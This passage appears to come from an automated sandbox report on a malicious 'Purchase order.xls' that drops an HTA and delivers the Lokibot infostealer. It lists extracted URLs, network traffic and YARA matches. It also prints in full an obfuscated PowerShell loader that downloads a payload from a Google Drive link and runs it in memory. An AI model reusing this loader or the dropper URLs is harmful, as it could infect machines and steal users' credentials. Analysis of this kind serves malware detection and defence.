Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000005.00000002.511869443.0000000002081000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.498611259.0000000002121000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.667153899.000000000230F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.565176374.0000000002391000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: aspnet_regbrowsers.exe, aspnet_regbrowsers.exe, 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://www.ibsensoftware.com/
Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000017.00000002.565176374.0000000002592000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000017.00000002.565176374.0000000002592000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur
Source: powershell.exe, 00000017.00000002.565176374.0000000002751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000017.00000002.565176374.0000000002751000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur&export=download
Source: powershell.exe, 00000005.00000002.519327515.00000000120B1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: mshta.exe, 00000004.00000003.463938971.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003BAF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.0000000003818000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.0000000003818000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qrisni.me/
Source: mshta.exe, 00000004.00000003.463626399.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463261220.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463517039.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464246158.0000000000522000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463900149.0000000000522000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qrisni.me/1;
Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qrisni.me/C
Source: mshta.exe, 00000008.00000003.490957335.00000000001FA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489453063.00000000001FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://qrisni.me/Z
Source: mshta.exe, 00000008.00000002.491361921.000000000018F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.0000000003841000.00000004.00000020.00020000.00000000.sdmp, Purchase order.xls, 23530000.0.dr	String found in binary or memory: https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&wa
Source: mshta.exe, 00000004.00000003.463938971.0000000003B6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.464732802.0000000003B70000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.463199089.0000000003B6B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.489392019.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.491863833.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.490007380.00000000037E0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 49163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 49165 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49165
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49163 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.22:49169 version: TLS 1.2

Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Window created: window name: CLIPBRDWNDCLASS			Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki Payload Author: kevoreilly
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000001A.00000002.665835166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1668, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3804, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: aspnet_regbrowsers.exe PID: 3900, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Excel sheet contains many unusual embedded objects

Source: Purchase order.xls	OLE: Microsoft Excel 2007+
Source: Purchase order.xls	OLE: Microsoft Excel 2007+
Source: Purchase order.xls	OLE: Microsoft Excel 2007+
Source: 23530000.0.dr	OLE: Microsoft Excel 2007+
Source: 23530000.0.dr	OLE: Microsoft Excel 2007+
Source: 23530000.0.dr	OLE: Microsoft Excel 2007+

Microsoft Office drops suspicious files

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\greatthingswithgoodnewsgivenbygodthingsgreat[1].hta

Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiggJHBTaG9tZVsyMV0rJFBzaE9tZVszMF0rJ3gnKSAoICgoJ3N3UmltYWdlVXJsID0gNWw3JysnaHR0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgNWw3O3N3UndlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XJysnZWJDbGllbnQ7c3dSaW1hZ2VCeXRlcyA9IHN3UndlYkNsaWVudC5Eb3dubG9hZERhdGEoc3dSaW1hZ2VVcmwpO3N3JysnUmltYWdlVGV4dCA9IFtTeXN0ZW0nKycuVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHN3UmltYWdlQnl0ZXMpO3N3UnN0YXJ0RmxhZyA9IDVsNzw8QkEnKydTRTY0X1NUQVJUPicrJz41bDc7c3dSZW5kRmxhZyA9IDVsNzw8QkFTRTY0X0VORD4+NWw3O3N3UnMnKyd0YXJ0SW5kZXggPSBzd1JpbWFnZVRleHQuSW5kZXhPZicrJyhzd1JzdGFydEZsYWcpO3N3UmVuZEluZGV4ID0gc3dSaW1hZ2VUJysnZXh0LkluZGV4T2Yoc3dSZW5kRmxhZyk7c3dSc3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHMnKyd3UmVuZEluZGV4IC1ndCBzd1JzdGEnKydydEluZGV4O3N3UnN0YXJ0SW5kZXggKz0gc3dSc3RhcnRGbGFnLkxlbmd0aDtzd1JiYXNlNjRMZW5ndGggPSBzd1JlbmRJbmRleCAtIHN3UnN0YXJ0SW5kZXg7c3dSYmFzZTY0Q29tbWFuZCA9IHN3UmltYWdlVGV4dC5TdWJzJysndHJpbmcoc3dSc3RhcnRJbmRleCwgc3dSYmFzZTY0TGVuZ3RoKTtzd1JiYXNlNjRSZXZlcnNlZCA9IC1qbycrJ2luIChzd1JiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgRncxJysnICcrJ0ZvckVhY2gtT2JqZWN0IHsgc3dSXyB9KVstMS4uLShzd1JiYXNlNjRDb21tYW5kLkxlbmd0aCldO3N3UmNvbW1hbmRCeXRlcyA9JysnIFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoc3dSYmFzZTY0UmV2ZXJzZWQpO3N3UmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChzd1Jjb21tYW5kQnl0ZXMpO3N3UnZhaU1ldGhvZCA9IFtkJysnbmxpYicrJy5JTy5Ib21lXS5HZXRNZXRob2QoNWw3VkFJNWw3KTtzd1J2YWlNZXRob2QuSW52b2tlKHN3Um51bGwsIEAoNWw3dHh0LlRUUkxQTVMvMTQvMTQxLjY3MS4zLjI5MS8vOnB0dGg1bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG81bDcsIDVsN2Rlc2F0aXZhZG8nKyc1bDcsICcrJzVsN2FzcG5ldF9yZWdicm93c2VyczVsNywgNWw3ZCcrJ2VzYXRpdmFkbzVsNywgNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3ZGVzYXRpdmFkbzVsNyw1bDdkZXNhdGl2YWRvNWw3LDVsN2Rlc2F0aXZhZG81bDcsNWw3MTVsNyw1bDdkZXNhdGl2YWRvNWw3KSk7JykgLXJlUExhY0UnNWw3JyxbY0hhcl0zOSAtcmVQTGFjRSAnc3dSJyxbY0hhcl0zNiAgLUNSZXBMQWNlICAnRncxJyxbY0hhcl0xMjQpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Memory allocated: 770B0000 page execute and read and write

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 26_2_0040549C	26_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 26_2_004029D4	26_2_004029D4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 26_2_012723B0	26_2_012723B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: 26_2_01273160	26_2_01273160

Source: Purchase order.xls

OLE indicator, VBA macros: true

Source: Purchase order.xls	Stream path 'MBD000EE997/\x1Ole' : https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddlej1/gR4sflG{QtQ"y&~;!<-DT@4?lU}.30ZAwZ)\|eEs=0.TWracBwl>ti3sA\|186s4\|yMSd[Z5lzpIxHYrIwUzJ4v1veikUI0F4V7ebSjlnle1bz61TbA3JL7hqwvx30HlolH1UkCZ4Uvri9hB5LgcTzmllxTe3iY7s0F1MbhMu0b2fI5hMZ8xIY*-nRjt^c}
Source: 23530000.0.dr	Stream path 'MBD000EE997/\x1Ole' : https://qrisni.me/gtLs6A?&volcano=wet&muscle=chilly&result=salty&perfume=jazzy&knickers=depressed&walk=sloppy&junior=alike&sweatshirt=clammy&puddlej1/gR4sflG{QtQ"y&~;!<-DT@4?lU}.30ZAwZ)\|eEs=0.TWracBwl>ti3sA\|186s4\|yMSd[Z5lzpIxHYrIwUzJ4v1veikUI0F4V7ebSjlnle1bz61TbA3JL7hqwvx30HlolH1UkCZ4Uvri9hB5LgcTzmllxTe3iY7s0F1MbhMu0b2fI5hMZ8xIY*-nRjt^c}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe

Registry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\52.0.1 (x86 en-US)\Main Install Directory

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2214
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 2214

Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 26.2.aspnet_regbrowsers.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 26.2.aspnet_regbrowsers.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
